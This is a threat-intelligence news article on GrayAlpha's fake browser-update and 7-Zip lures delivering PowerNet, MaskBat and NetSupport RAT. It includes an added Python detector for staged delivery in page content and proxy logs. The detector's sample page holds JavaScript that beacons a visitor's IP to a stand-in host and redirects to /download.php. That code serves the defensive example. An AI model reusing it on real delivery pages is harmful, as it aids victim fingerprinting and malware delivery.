GrayAlpha Hacker Group Exploits Browser Updates to Deploy PowerNet Loader and NetSupport RAT
Newly identified infrastructure linked to GrayAlpha, a cybercriminal entity that overlaps with the notorious FIN7 group, has been exposed by Recorded Future's Insikt Group.
This financially motivated threat actor, active since at least 2013, is known for its sophisticated attacks targeting retail, hospitality, and financial sectors.
Custom Malware Uncovered
The latest findings reveal GrayAlpha's use of custom malware, including a PowerShell loader dubbed PowerNet, designed to decompress and execute NetSupport RAT. NetSupport RAT is the legitimate NetSupport Manager remote-administration tool repurposed as a remote access trojan, and it is widely abused by criminal groups because its traffic and binaries look like ordinary IT tooling.
Additionally, a second loader, MaskBat, bears similarities to the known FakeBat malware but is heavily obfuscated and contains unique strings tied to GrayAlpha's operations.
This discovery underscores the group's continued investment in evading detection and maintaining access to compromised systems.
Infection Vectors Leverage Fake Updates
Insikt Group identified three primary infection vectors employed by GrayAlpha to distribute NetSupport RAT, showcasing their diverse and deceptive tactics.

Among these, fake browser update pages impersonating legitimate services like Google Meet, SAP Concur, and LexisNexis have been active since April 2024, tricking users into downloading malicious payloads via seemingly innocuous prompts.
Another vector involves fraudulent 7-Zip download sites, which remain active, with newly registered domains appearing as recently as April 2025.
The third method utilizes the TAG-124 traffic distribution system (TDS), highlighting GrayAlpha's ability to exploit lesser-known delivery mechanisms.
Infrastructure analysis reveals heavy reliance on bulletproof hosting providers like Stark Industries Solutions (AS44477) and entities tied to Baykov Ilya Sergeevich (ORG-HIP1-RIPE), which keep the group's malicious domains and IP addresses online despite takedown and blocking efforts.

These hosts have historically supported FIN7 malware like POWERTRASH and DiceLoader, reinforcing the overlap with GrayAlpha’s tradecraft.
The fake update sites often embed fingerprinting scripts with functions such as getIPAddress() and trackPageOpen(), which relay victim data (at minimum the visitor's IP address and a page-open event) to CDN-themed domains before the payload is served from endpoints like /download.php.
Gating delivery on the fingerprint results lets the operators serve the malware only to visitors that match their targeting criteria, which also starves sandboxes and crawlers of the final payload and complicates detection.
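The two-stage pattern above (fingerprinting beacon to a CDN-themed host, then a fetch of /download.php) is something a defender can hunt for in page content and in proxy logs. The following is an added example written for this page, not code from the Recorded Future report or from GrayAlpha's own scripts. The only indicators taken from the article are the function names getIPAddress and trackPageOpen and the /download.php path; the "cdn" hostname heuristic, the log format, and every hostname and IP in the sample data are constructed assumptions.

```python
"""
Added example (not from the article or the report): detect the staged
fake-update delivery pattern in page content and in web-proxy logs.
Indicators from the article: getIPAddress(), trackPageOpen(), /download.php.
Everything else (CDN-themed host heuristic, log format, sample data) is
constructed for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

FINGERPRINT_FUNCS = ("getIPAddress", "trackPageOpen")   # names from the article
PAYLOAD_PATH = "/download.php"                          # endpoint from the article
# Heuristic (assumption): a hostname label that is exactly "cdn", e.g. cdn-stats.example
CDN_THEMED = re.compile(r"(^|[.-])cdn([.-]|$)", re.IGNORECASE)
HOST_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)[^"'\s]*""")


def score_page(html: str) -> dict:
    """Report which fake-update indicators appear in a page's inline script."""
    found = [f for f in FINGERPRINT_FUNCS if re.search(rf"\b{f}\s*\(", html)]
    hosts = HOST_RE.findall(html)
    cdn_hosts = sorted({h for h in hosts if CDN_THEMED.search(h)})
    has_payload = PAYLOAD_PATH in html
    return {
        "fingerprint_functions": found,
        "cdn_themed_hosts": cdn_hosts,
        "download_endpoint": has_payload,
        # Fingerprinting alone is common; require the beacon or payload stage too.
        "suspicious": bool(found) and (bool(cdn_hosts) or has_payload),
    }


@dataclass
class Request:
    ts: int
    client: str
    host: str
    path: str


# Constructed log format: "<epoch> <client> <METHOD> <url>"
LOG_RE = re.compile(r"^(\d+) (\S+) (?:GET|POST) https?://([^/\s]+)(/\S*)")


def parse_log(lines):
    """Parse the constructed proxy-log format, skipping lines that do not match."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            out.append(Request(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return out


def find_staged_deliveries(requests, window=300):
    """Clients that beaconed to a CDN-themed host and then fetched
    /download.php within `window` seconds. Returns (client, beacon_host,
    payload_host, payload_ts) tuples."""
    by_client = defaultdict(list)
    for r in requests:
        by_client[r.client].append(r)
    hits = []
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r.ts)
        beacon_ts, beacon_host = None, None
        for r in reqs:
            if CDN_THEMED.search(r.host):
                beacon_ts, beacon_host = r.ts, r.host
            elif (r.path.split("?")[0] == PAYLOAD_PATH
                  and beacon_ts is not None
                  and r.ts - beacon_ts <= window):
                hits.append((client, beacon_host, r.host, r.ts))
    return hits


# Constructed sample page mimicking the described fingerprint-then-download flow.
SAMPLE_PAGE = """<html><body>
<p>Your browser is out of date. Click Update to continue.</p>
<script>
async function getIPAddress() { return (await fetch("https://cdn-stats.example/ip")).text(); }
function trackPageOpen(ip) { fetch("https://cdn-stats.example/collect?ip=" + ip); }
getIPAddress().then(ip => { trackPageOpen(ip); location.href = "/download.php?id=7"; });
</script></body></html>"""

# Constructed proxy log: 10.0.0.5 shows the staged pattern; 10.0.0.9 hits a
# CDN host and a /download.php, but 800 s apart, so it is outside the window.
SAMPLE_LOG = """\
1712000000 10.0.0.5 GET https://meet-update.example/index.html
1712000003 10.0.0.5 POST https://cdn-stats.example/collect
1712000010 10.0.0.5 GET https://meet-update.example/download.php?id=7
1712000400 10.0.0.9 GET https://cdn.jsdelivr.example/lib.js
1712001200 10.0.0.9 GET https://intranet.example/download.php
""".splitlines()


def main():
    print(score_page(SAMPLE_PAGE))
    for hit in find_staged_deliveries(parse_log(SAMPLE_LOG)):
        print("staged delivery:", hit)


if __name__ == "__main__":
    main()
```

The time window is deliberately short: the fingerprint beacon and the download happen in the same browsing session, so a long gap between a CDN lookup and an unrelated /download.php on an internal site should not fire, as the second client in the sample shows. Tune CDN_THEMED to the domains actually observed in your environment; the label-based regex is only a starting heuristic.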
Meanwhile, historical data shows FIN7’s prior use of typosquatted domains like advanced-ip-sccanner[.]com as early as 2023 to distribute Carbanak backdoors, indicating a long-standing pattern of impersonation tactics now refined by GrayAlpha.
The group’s operational resilience, even after high-profile indictments of FIN7 leaders by the US DOJ in 2018, points to a deeply compartmentalized structure akin to a professional business, with specialized teams for malware development, phishing, and post-compromise activities.
Defenders are urged to adopt stringent application allow-lists to block deceptive downloads and to implement employee training focused on recognizing malvertising and suspicious prompts.
Detection content such as YARA signatures, combined with network monitoring for the group's hosting and delivery infrastructure (the report points to Recorded Future Network Intelligence), is critical to identifying these evolving threats.
As cybercrime continues to professionalize, with groups like GrayAlpha mirroring the persistence of state-sponsored APTs, organizations must remain vigilant and adaptive to counter this growing menace.